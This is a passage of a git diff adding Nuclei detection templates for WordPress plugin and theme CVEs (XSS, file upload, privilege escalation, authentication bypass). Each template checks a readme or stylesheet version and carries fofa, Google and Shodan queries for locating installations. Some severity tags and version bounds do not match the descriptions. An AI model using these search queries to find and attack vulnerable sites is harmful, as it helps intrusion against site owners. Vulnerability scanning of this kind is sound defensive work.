Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + The WP User Profile Avatar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/af053fdc-e40c-4dfa-8d16-09c72d839031?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2023-6067 + metadata: + fofa-query: "wp-content/plugins/wp-user-profile-avatar/" + google-query: inurl:"/wp-content/plugins/wp-user-profile-avatar/" + shodan-query: 'vuln:CVE-2023-6067' + tags: cve,wordpress,wp-plugin,wp-user-profile-avatar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-user-profile-avatar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-user-profile-avatar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb.yaml b/poc/cve/CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb.yaml new file mode 100644 index 0000000000..986f277833 --- /dev/null +++ b/poc/cve/CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb + +info: + name: > + Enfold <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via wrapper_class and class Parameters + author: topscoder + severity: low + description: > + The Enfold - Responsive Multi-Purpose Theme theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wrapper_class’ and 'class' parameters in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/25462492-59d2-44b7-81c3-93ac04a08bcc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5061 + metadata: + fofa-query: "wp-content/themes/enfold/" + google-query: inurl:"/wp-content/themes/enfold/" + shodan-query: 'vuln:CVE-2024-5061' + tags: cve,wordpress,wp-theme,enfold,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/enfold/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "enfold" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml b/poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml new file mode 100644 index 0000000000..0037419a5f --- /dev/null +++ b/poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5416-b035cee38aeca20c0511efbe55146c96 + +info: + name: > + Elementor Website Builder – More than Just a Page Builder <= 3.23.4 - Authenticated (Contributor+) Stored Cross-Site Scripting in the URL Parameter in Multiple Widgets + author: topscoder + severity: low + description: > + The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url parameter of multiple widgets in all versions up to, and including, 3.23.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in Elementor Editor pages. This was partially patched in version 3.23.2. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-5416 + metadata: + fofa-query: "wp-content/plugins/elementor/" + google-query: inurl:"/wp-content/plugins/elementor/" + shodan-query: 'vuln:CVE-2024-5416' + tags: cve,wordpress,wp-plugin,elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.23.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6282.yaml b/poc/cve/CVE-2024-6282.yaml new file mode 100644 index 0000000000..1ad28ed477 --- /dev/null +++ b/poc/cve/CVE-2024-6282.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6282 + +info: + name: > + Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor <= 2.0.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via data-jltma-wrapper-link Element + author: topscoder + severity: low + description: > + The Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-jltma-wrapper-link element in all versions up to, and including 2.0.6.4 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks on the injected link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8bab0acc-5a5d-4dd4-9201-199b7f5aaa69?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-6282 + metadata: + fofa-query: "wp-content/plugins/master-addons/" + google-query: inurl:"/wp-content/plugins/master-addons/" + shodan-query: 'vuln:CVE-2024-6282' + tags: cve,wordpress,wp-plugin,master-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/master-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "master-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml b/poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml new file mode 100644 index 0000000000..e5dd1f11a1 --- /dev/null +++ b/poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6335-84de910af85c0afe2f599b3df45be46d + +info: + name: > + Tracking Code Manager <= 2.2.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Tracking Code Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9bd1fe45-8518-429b-94d3-cc0ea06ca1b4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6335 + metadata: + fofa-query: "wp-content/plugins/tracking-code-manager/" + google-query: inurl:"/wp-content/plugins/tracking-code-manager/" + shodan-query: 'vuln:CVE-2024-6335' + tags: cve,wordpress,wp-plugin,tracking-code-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tracking-code-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tracking-code-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7618.yaml b/poc/cve/CVE-2024-7618.yaml new file mode 100644 index 0000000000..6bfe29c0a3 --- /dev/null +++ b/poc/cve/CVE-2024-7618.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7618 + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via content Parameter + author: topscoder + severity: low + description: > + The Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘content’ parameter in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7618 + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:CVE-2024-7618' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml b/poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml new file mode 100644 index 0000000000..3fc892bc8b --- /dev/null +++ b/poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1 + +info: + name: > + WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) <= 1.6.9 - Improper Path Validation to Authenticated (Subscriber+) Arbitrary File Move and Read + author: topscoder + severity: low + description: > + The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file movement and reading due to insufficient file path validation in the save_edit_profile_details() function in all versions up to, and including, 1.6.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php). This can also lead to the reading of arbitrary files that may contain sensitive information like wp-config.php. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c98bb53-9f7e-4ab3-9676-e3dbfb4a0519?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N + cvss-score: 8.1 + cve-id: CVE-2024-7626 + metadata: + fofa-query: "wp-content/plugins/delicious-recipes/" + google-query: inurl:"/wp-content/plugins/delicious-recipes/" + shodan-query: 'vuln:CVE-2024-7626' + tags: cve,wordpress,wp-plugin,delicious-recipes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/delicious-recipes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "delicious-recipes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7655.yaml b/poc/cve/CVE-2024-7655.yaml new file mode 100644 index 0000000000..6e5e06b82d --- /dev/null +++ b/poc/cve/CVE-2024-7655.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7655 + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e85ee611-ae81-4736-b4f0-b9d06714da18?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7655 + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:CVE-2024-7655' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml b/poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml new file mode 100644 index 0000000000..1b25cef619 --- /dev/null +++ b/poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5 + +info: + name: > + HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.34 - Missing Authorization to Authenticated (Subscriber+) Limited Options Update + author: topscoder + severity: low + description: > + The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_password' function in all versions up to, and including, 2.5.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to set any options that are not explicitly checked as false to an array, including enabling user registration if it has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc3f308-d1e1-430b-bccd-168c0972fe7c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7721 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-7721' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.34') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml b/poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml new file mode 100644 index 0000000000..de404f5e99 --- /dev/null +++ b/poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37 + +info: + name: > + HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.32 - Missing Authorization in multiple functions via h5vp_ajax_handler + author: topscoder + severity: high + description: > + The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple functions called via the 'h5vp_ajax_handler' ajax action in all versions up to, and including, 2.5.32. This makes it possible for unauthenticated attackers to call these functions to manipulate data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/908df18e-7178-4d40-becb-86e1a714a7da?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-7727 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-7727' + tags: cve,wordpress,wp-plugin,html5-video-player,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.32') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7770.yaml b/poc/cve/CVE-2024-7770.yaml new file mode 100644 index 0000000000..3f25f4de91 --- /dev/null +++ b/poc/cve/CVE-2024-7770.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7770 + +info: + name: > + Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress <= 6.5.5 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload' function in all versions up to, and including, 6.5.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted upload permissions by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cae7702-e531-45b9-9131-42edbc073a07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7770 + metadata: + fofa-query: "wp-content/plugins/file-manager/" + google-query: inurl:"/wp-content/plugins/file-manager/" + shodan-query: 'vuln:CVE-2024-7770' + tags: cve,wordpress,wp-plugin,file-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/file-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "file-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.5.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml b/poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml new file mode 100644 index 0000000000..7235bf360b --- /dev/null +++ b/poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e + +info: + name: > + Advanced WordPress Backgrounds <= 1.12.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via imageTag Parameter + author: topscoder + severity: low + description: > + The Advanced WordPress Backgrounds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘imageTag’ parameter in all versions up to, and including, 1.12.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/78e49869-5e7e-45f2-8239-4df18b28db53?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8045 + metadata: + fofa-query: "wp-content/plugins/advanced-backgrounds/" + google-query: inurl:"/wp-content/plugins/advanced-backgrounds/" + shodan-query: 'vuln:CVE-2024-8045' + tags: cve,wordpress,wp-plugin,advanced-backgrounds,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-backgrounds/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-backgrounds" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.12.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8241.yaml b/poc/cve/CVE-2024-8241.yaml new file mode 100644 index 0000000000..e3dc0db594 --- /dev/null +++ b/poc/cve/CVE-2024-8241.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8241 + +info: + name: > + Nova Blocks by Pixelgrade <= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + The Nova Blocks by Pixelgrade plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' attribute of the 'wp:separator' Gutenberg block in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3011befd-c0c6-4800-a370-e592c3ec483f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8241 + metadata: + fofa-query: "wp-content/plugins/nova-blocks/" + google-query: inurl:"/wp-content/plugins/nova-blocks/" + shodan-query: 'vuln:CVE-2024-8241' + tags: cve,wordpress,wp-plugin,nova-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nova-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nova-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml b/poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml new file mode 100644 index 0000000000..58174bec12 --- /dev/null +++ b/poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8253-e2234cc208110923d0c092c69c0a152e + +info: + name: > + Post Grid and Gutenberg Blocks 2.2.87 - 2.2.90 - Authenticated (Subscriber+) Privilege Escalation + author: topscoder + severity: low + description: > + The Post Grid and Gutenberg Blocks plugin for WordPress is vulnerable to privilege escalation in all versions 2.2.87 to 2.2.90. This is due to the plugin not properly restricting what user meta values can be updated and ensuring a form is active. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta to become an administrator. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5f18cae-b7f8-4afd-adfa-c616c63f9419?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-8253 + metadata: + fofa-query: "wp-content/plugins/post-grid/" + google-query: inurl:"/wp-content/plugins/post-grid/" + shodan-query: 'vuln:CVE-2024-8253' + tags: cve,wordpress,wp-plugin,post-grid,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-grid/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-grid" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 2.2.87', '<= 2.2.90') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8268.yaml b/poc/cve/CVE-2024-8268.yaml new file mode 100644 index 0000000000..139fb64172 --- /dev/null +++ b/poc/cve/CVE-2024-8268.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8268 + +info: + name: > + Frontend Dashboard <= 2.2.4 - Authenticated (Subscriber+) Arbitrary Function Call + author: topscoder + severity: low + description: > + The Frontend Dashboard plugin for WordPress is vulnerable to unauthorized code execution due to insufficient filtering on callable methods/functions via the ajax_request() function in all versions up to, and including, 2.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to call arbitrary functions that can be leverage for privilege escalation by changing user's passwords. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d66694a-c99f-44f8-8004-1a47ad9f9250?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-8268 + metadata: + fofa-query: "wp-content/plugins/frontend-dashboard/" + google-query: inurl:"/wp-content/plugins/frontend-dashboard/" + shodan-query: 'vuln:CVE-2024-8268' + tags: cve,wordpress,wp-plugin,frontend-dashboard,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/frontend-dashboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "frontend-dashboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml b/poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml new file mode 100644 index 0000000000..67784e4f0d --- /dev/null +++ b/poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19 + +info: + name: > + WooCommerce Photo Reviews Premium <= 1.3.13.2 - Authentication Bypass to Account Takeover and Privilege Escalation + author: topscoder + severity: critical + description: > + The WooCommerce Photo Reviews Premium plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.3.13.2. This is due to the plugin not properly validating what user transient is being used in the login() function and not properly verifying the user's identity. This makes it possible for unauthenticated attackers to log in as user that has dismissed an admin notice in the past 30 days, which is often an administrator. Alternatively, a user can log in as any user with any transient that has a valid user_id as the value, though it would be more difficult to exploit this successfully. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - 